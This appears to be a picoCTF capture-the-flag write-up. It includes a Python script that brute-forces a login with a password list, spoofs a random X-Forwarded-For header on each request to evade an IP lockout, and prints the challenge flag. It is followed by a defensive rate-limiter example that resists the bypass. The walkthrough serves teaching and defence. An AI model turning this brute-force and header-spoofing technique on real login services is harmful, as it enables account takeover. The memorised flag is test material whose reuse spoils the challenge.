Solution
Download the password dictionary provided by the challenge
wget https://challenge-files.picoctf.net/c_amiable_citadel/ee2e840feeb2448808f2e1c94b22d339de8e4d87a5ee744a960c59b7a1552829/passwords.txt
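Check the format of the password dictionary provided by the challenge
Inspect the format of the login request; note that it sends its data as JSON
Look at the front-end page source
Use the Python requests module to write a program that tries the logins automatically, pausing for a 30-second interval after the 9th attempt (35 seconds to be safe) to avoid being locked out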
```python
import time
import random
import requests

username = "ctf-player@picoctf.org"

# Load the candidate passwords, one per line
password = []
with open("passwords.txt", "r") as f:
    for line in f.readlines():
        password.append(line.strip())

url = "http://amiable-citadel.picoctf.net:54800/login"
headers = {
    "Host": "amiable-citadel.picoctf.net:54800",
    # Content-Length is omitted: requests computes it from the JSON body
    "Accept-Language": "zh-TW,zh;q=0.9",
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36",
    "Content-Type": "application/json",
    "Accept": "*/*",
    "Origin": "http://amiable-citadel.picoctf.net:54800",
    "Referer": "http://amiable-citadel.picoctf.net:54800/",
    "Accept-Encoding": "gzip, deflate, br",
    "Connection": "keep-alive",
}

for i in range(0, len(password)):
    # Send a different random X-Forwarded-For value with every request
    headers["X-Forwarded-For"] = f"{random.randint(1,255)}.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(0,255)}"
    data = {
        "email": username,
        "password": password[i],
    }
    r = requests.post(url, json=data, headers=headers)
    resp = r.json()
    if resp.get("success"):
        print("Login successful!!")
        print(resp.get("flag"))
        break
    print("Trying username: " + username + " password: " + password[i] + " error!!")
```
Run the program to get the flag

picoCTF{xff_byp4ss_brut3_ff36dbbc}
Submit the flag
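
Seen from the server side, this is an added example, not part of the original write-up or the challenge's code: a failed-login limiter keyed on the left-most X-Forwarded-For entry next to one that only reads the header from its own proxy and can also count per account. It assumes the challenge's lockout is keyed on that header; the proxy range, the 9-in-30-seconds policy, all function names and the sample addresses are constructed for illustration.

```python
import ipaddress
from collections import defaultdict, deque

TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]  # assumed: our own reverse proxies
MAX_FAILURES, WINDOW_SECONDS = 9, 30  # assumed policy, mirroring the numbers in the write-up

def is_trusted(ip):
    return any(ipaddress.ip_address(ip) in net for net in TRUSTED_PROXIES)  # ValueError if malformed

def naive_client_ip(peer_ip, headers):
    """Weak: believes the left-most X-Forwarded-For entry, which the client controls."""
    return headers.get("X-Forwarded-For", peer_ip).split(",")[0].strip()

def trusted_client_ip(peer_ip, headers):
    """Hardened: read the header only from our proxy, right to left, skipping our own hops."""
    xff = headers.get("X-Forwarded-For", "") if is_trusted(peer_ip) else ""
    for hop in reversed([h.strip() for h in xff.split(",") if h.strip()]):
        try:
            if not is_trusted(hop):
                return hop
        except ValueError:
            break  # malformed entry: stop trusting the rest of the header
    return peer_ip

class LoginLimiter:
    def __init__(self, resolve_ip, per_account=False):
        self.resolve_ip, self.per_account = resolve_ip, per_account
        self.failures = defaultdict(deque)  # key -> timestamps of recent failed logins

    def allow_failed_attempt(self, peer_ip, headers, email, now):
        """Record one failed login; return False if any key is already over the limit."""
        keys = [("ip", self.resolve_ip(peer_ip, headers))]
        if self.per_account:
            keys.append(("acct", email.lower()))  # survives any change of source address
        for key in keys:
            q = self.failures[key]
            while q and now - q[0] > WINDOW_SECONDS:
                q.popleft()
            if len(q) >= MAX_FAILURES:
                return False
        for key in keys:
            self.failures[key].append(now)
        return True

def simulate(limiter, attempts=50):
    """Constructed traffic: client 203.0.113.7 via proxy 10.0.0.5, a new spoofed entry each try."""
    xff = lambda i: {"X-Forwarded-For": f"198.51.100.{i + 1}, 203.0.113.7"}
    return sum(limiter.allow_failed_attempt("10.0.0.5", xff(i), "a@example.com", i * 0.1)
               for i in range(attempts))
```

With the naive resolver every one of the 50 simulated failures is accepted; with the trusted resolver, or with the per-account key switched on, only the first 9 are.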